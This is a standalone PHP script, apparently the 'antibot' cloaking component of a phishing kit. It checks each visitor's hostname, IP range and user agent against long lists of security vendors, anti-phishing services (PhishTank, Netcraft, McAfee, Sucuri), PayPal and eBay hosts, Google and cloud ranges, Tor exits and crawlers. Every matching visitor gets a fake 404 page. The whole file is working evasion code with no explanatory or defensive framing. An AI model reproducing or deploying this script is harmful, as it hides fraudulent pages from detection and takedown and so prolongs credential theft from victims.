<?php
$hostname      = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array(
    'above',
    'google',
    'softlayer',
    'amazonaws',
    'cyveillance',
    'phishtank',
    'dreamhost',
    'netpilot',
    'calyxinstitute',
    'tor-exit',
    'tor-node',
    'msnbot',
    'p3pwgdsn',
    'netcraft',
    'trendmicro',
    'ebay',
    'paypal',
    'torservers',
    'comodo',
    'crawl',
    'sucuri.net',
    'crawler',
    'proxy',
    'enom',
    'cloudflare',
    'yahoo',
    'trustwave',
    'rima-tde.net',
    'tfbnw.net',
    'pacbell.net',
    'tpnet.pl',
    'ovh.net',
    'centralnic',
    'badware',
    'phishing',
    'antivirus',
    'SiteAdvisor',
    'McAfee',
    'Bitdefender',
    'avirasoft',
    'phishtank.com',
    '*.google.com',
    'dnblead.com',
    'static.spro.net',
    'phishmongers.com',
    'googleusercontent'
);
foreach ($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
        header('HTTP/1.0 404 Not Found');
        die('<h1>404 Not Found</h1>The page that you have requested could not be found.');
        
    }
}
$bannedIP = array(
    '^104.236.*',
    '^107.170.*',
    '^64.71.*',
    '^64.71.*',
    '^64.71.*',
    '^66.102.*',
    '^157.55.*',
    '^105.107.*',
    '^4.14.64.*',
    '^64.74.*',
    '^198.186.*',
    '^198.186.*',
    '^198.186.*',
    '^198.186.*',
    '^109.186.*',
    '^12.148.*',
    '^12.148.*',
    '^128.242.*',
    '^131.212.*',
    '^149.20.*',
    '^158.108.*',
    '^163.195.*',
    '^167.24.*',
    '^168.188.*',
    '^173.194.*',
    '^173.224.*',
    '^173.224.*',
    '^173.224.*',
    '^173.224.*',
    '^173.224.*',
    '^173.224.*',
    '^173.224.*',
    '^173.224.*',
    '^184.173.*',
    '^192.115.*',
    '^192.118.*',
    '^193.220.*',
    '^193.253.*',
    '^193.47.*',
    '^194.52.*',
    '^194.72.*',
    '^194.90.*',
    '^198.25.*',
    '^198.54.*',
    '^199.30.*',
    '^202.108.*',
    '^204.14.*',
    '^206.28.*',
    '^207.126.*',
    '^208.65.*',
    '^208.91.*',
    '^209.73.*',
    '^209.85.*.*',
    '^209.85.*',
    '^212.143.*',
    '^212.150.*',
    '^212.235.*',
    '^212.29.*',
    '^212.29.*',
    '^212.50.*',
    '^216.10.*',
    '^216.239.*',
    '^216.252.*',
    '^217.132.*',
    '^217.132.*',
    '^38.100.*',
    '^38.100.*',
    '^38.105.*',
    '^38.144.*',
    '^46.116.* ',
    '^50.7.*',
    '^50.97.*',
    '^54.176.*',
    '^62.116.*',
    '^62.90.*',
    '^64.106.*',
    '^64.124.*',
    '^64.18.*',
    '^64.233.*',
    '^64.27.*',
    '^64.37.*',
    '^64.62.*',
    '^64.62.*',
    '^66.102.*',
    '^66.102.*',
    '^66.135.*',
    '^66.150.*',
    '^66.205.*',
    '^66.207.*',
    '^66.221.*',
    '^66.249.*',
    '^67.15.*',
    '^67.209.*',
    '^68.65.*',
    '^69.61.*',
    '^69.65.*.*',
    '^72.14.*',
    '^72.14.*',
    '^74.125.*',
    '^74.125.*',
    '^74.125.*',
    '^81.161.*',
    '^82.166.*',
    '^85.250.*',
    '^85.64.*',
    '^89.138.*',
    '^89.138.*',
    '^91.103.*',
    '^93.172.*',
    '^95.76.*'
);
if (in_array($_SERVER['REMOTE_ADDR'], $bannedIP)) {
    header('HTTP/1.0 404 Not Found');
    exit();
} else {
    foreach ($bannedIP as $ip) {
        if (preg_match('/' . $ip . '/', $_SERVER['REMOTE_ADDR'])) {
            header('HTTP/1.0 404 Not Found');
            die('<h1>404 Not Found</h1>The page that you have requested could not be found.');
        }
    }
}
if (preg_match('/legs\.com|bitly/si', $_SERVER["HTTP_USER_AGENT"])) {
    header('HTTP/1.0 404 Not Found');
    die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
}
if (preg_match('/67\.221\.235\.(.*?)|74\.3\.160\.(.*?)/', $_SERVER['REMOTE_ADDR'])) {
    header('HTTP/1.0 404 Not Found');
    die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
}
$Bot = array(
    "abot",
    "dbot",
    "ebot",
    "hbot",
    "kbot",
    "lbot",
    "mbot",
    "nbot",
    "obot",
    "pbot",
    "rbot",
    "sbot",
    "tbot",
    "vbot",
    "ybot",
    "zbot",
    "bot.",
    "bot/",
    "_bot",
    ".bot",
    "/bot",
    "-bot",
    ":bot",
    "(bot",
    "crawl",
    "slurp",
    "spider",
    "seek",
    "accoona",
    "acoon",
    "adressendeutschland",
    "ah-ha.com",
    "ahoy",
    "altavista",
    "ananzi",
    "anthill",
    "appie",
    "arachnophilia",
    "arale",
    "araneo",
    "aranha",
    "architext",
    "aretha",
    "arks",
    "asterias",
    "atlocal",
    "atn",
    "atomz",
    "augurfind",
    "backrub",
    "bannana_bot",
    "baypup",
    "bdfetch",
    "big brother",
    "biglotron",
    "bjaaland",
    "blackwidow",
    "blaiz",
    "blog",
    "blo.",
    "bloodhound",
    "boitho",
    "booch",
    "bradley",
    "butterfly",
    "calif",
    "cassandra",
    "ccubee",
    "cfetch",
    "charlotte",
    "churl",
    "cienciaficcion",
    "cmc",
    "collective",
    "comagent",
    "combine",
    "computingsite",
    "csci",
    "curl",
    "cusco",
    "daumoa",
    "deepindex",
    "delorie",
    "depspid",
    "deweb",
    "die blinde kuh",
    "digger",
    "ditto",
    "dmoz",
    "docomo",
    "download express",
    "dtaagent",
    "dwcp",
    "ebiness",
    "ebingbong",
    "e-collector",
    "ejupiter",
    "emacs-w3 search engine",
    "esther",
    "evliya celebi",
    "ezresult",
    "falcon",
    "felix ide",
    "ferret",
    "fetchrover",
    "fido",
    "findlinks",
    "fireball",
    "fish search",
    "fouineur",
    "funnelweb",
    "gazz",
    "gcreep",
    "genieknows",
    "getterroboplus",
    "geturl",
    "glx",
    "goforit",
    "golem",
    "grabber",
    "grapnel",
    "gralon",
    "griffon",
    "gromit",
    "grub",
    "gulliver",
    "hamahakki",
    "harvest",
    "havindex",
    "helix",
    "heritrix",
    "hku www octopus",
    "homerweb",
    "htdig",
    "html index",
    "html_analyzer",
    "htmlgobble",
    "hubater",
    "hyper-decontextualizer",
    "ia_archiver",
    "ibm_planetwide",
    "ichiro",
    "iconsurf",
    "iltrovatore",
    "image.kapsi.net",
    "imagelock",
    "incywincy",
    "indexer",
    "infobee",
    "informant",
    "ingrid",
    "inktomisearch.com",
    "inspector web",
    "intelliagent",
    "internet shinchakubin",
    "ip3000",
    "iron33",
    "israeli-search",
    "ivia",
    "jack",
    "jakarta",
    "javabee",
    "jetbot",
    "jumpstation",
    "katipo",
    "kdd-explorer",
    "kilroy",
    "knowledge",
    "kototoi",
    "kretrieve",
    "labelgrabber",
    "lachesis",
    "larbin",
    "legs",
    "libwww",
    "linkalarm",
    "link validator",
    "linkscan",
    "lockon",
    "lwp",
    "lycos",
    "magpie",
    "mantraagent",
    "mapoftheinternet",
    "marvin/",
    "mattie",
    "mediafox",
    "mediapartners",
    "mercator",
    "merzscope",
    "microsoft url control",
    "minirank",
    "miva",
    "mj12",
    "mnogosearch",
    "moget",
    "monster",
    "moose",
    "motor",
    "multitext",
    "muncher",
    "muscatferret",
    "mwd.search",
    "myweb",
    "najdi",
    "nameprotect",
    "nationaldirectory",
    "nazilla",
    "ncsa beta",
    "nec-meshexplorer",
    "nederland.zoek",
    "netcarta webmap engine",
    "netmechanic",
    "netresearchserver",
    "netscoop",
    "newscan-online",
    "nhse",
    "nokia6682/",
    "nomad",
    "noyona",
    "nutch",
    "nzexplorer",
    "objectssearch",
    "occam",
    "omni",
    "open text",
    "openfind",
    "openintelligencedata",
    "orb search",
    "osis-project",
    "pack rat",
    "pageboy",
    "pagebull",
    "page_verifier",
    "panscient",
    "parasite",
    "partnersite",
    "patric",
    "pear.",
    "pegasus",
    "peregrinator",
    "pgp key agent",
    "phantom",
    "phpdig",
    "picosearch",
    "piltdownman",
    "pimptrain",
    "pinpoint",
    "pioneer",
    "piranha",
    "plumtreewebaccessor",
    "pogodak",
    "poirot",
    "pompos",
    "poppelsdorf",
    "poppi",
    "popular iconoclast",
    "psycheclone",
    "publisher",
    "python",
    "rambler",
    "raven search",
    "roach",
    "road runner",
    "roadhouse",
    "robbie",
    "robofox",
    "robozilla",
    "rules",
    "salty",
    "sbider",
    "scooter",
    "scoutjet",
    "scrubby",
    "search.",
    "searchprocess",
    "semanticdiscovery",
    "senrigan",
    "sg-scout",
    "shai'hulud",
    "shark",
    "shopwiki",
    "sidewinder",
    "sift",
    "silk",
    "simmany",
    "site searcher",
    "site valet",
    "sitetech-rover",
    "skymob.com",
    "sleek",
    "smartwit",
    "sna-",
    "snappy",
    "snooper",
    "sohu",
    "speedfind",
    "sphere",
    "sphider",
    "spinner",
    "spyder",
    "steeler/",
    "suke",
    "suntek",
    "supersnooper",
    "surfnomore",
    "sven",
    "sygol",
    "szukacz",
    "tach black widow",
    "tarantula",
    "templeton",
    "/teoma",
    "t-h-u-n-d-e-r-s-t-o-n-e",
    "theophrastus",
    "titan",
    "titin",
    "tkwww",
    "toutatis",
    "t-rex",
    "tutorgig",
    "twiceler",
    "twisted",
    "ucsd",
    "udmsearch",
    "url check",
    "updated",
    "vagabondo",
    "valkyrie",
    "verticrawl",
    "victoria",
    "vision-search",
    "volcano",
    "voyager/",
    "voyager-hc",
    "w3c_validator",
    "w3m2",
    "w3mir",
    "walker",
    "wallpaper",
    "wanderer",
    "wauuu",
    "wavefire",
    "web core",
    "web hopper",
    "web wombat",
    "webbandit",
    "webcatcher",
    "webcopy",
    "webfoot",
    "weblayers",
    "weblinker",
    "weblog monitor",
    "webmirror",
    "webmonkey",
    "webquest",
    "webreaper",
    "websitepulse",
    "websnarf",
    "webstolperer",
    "webvac",
    "webwalk",
    "webwatch",
    "webwombat",
    "webzinger",
    "wget",
    "whizbang",
    "whowhere",
    "wild ferret",
    "worldlight",
    "wwwc",
    "wwwster",
    "xenu",
    "xget",
    "xift",
    "xirq",
    "yandex",
    "yanga",
    "yeti",
    "yodao",
    "zao/",
    "zippp",
    "zyborg"
);
foreach ($Bot as $BotType) {
    if (stripos($_SERVER['HTTP_USER_AGENT'], $BotType) !== false) {
        header('HTTP/1.0 404 Not Found');
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
    }
}

?>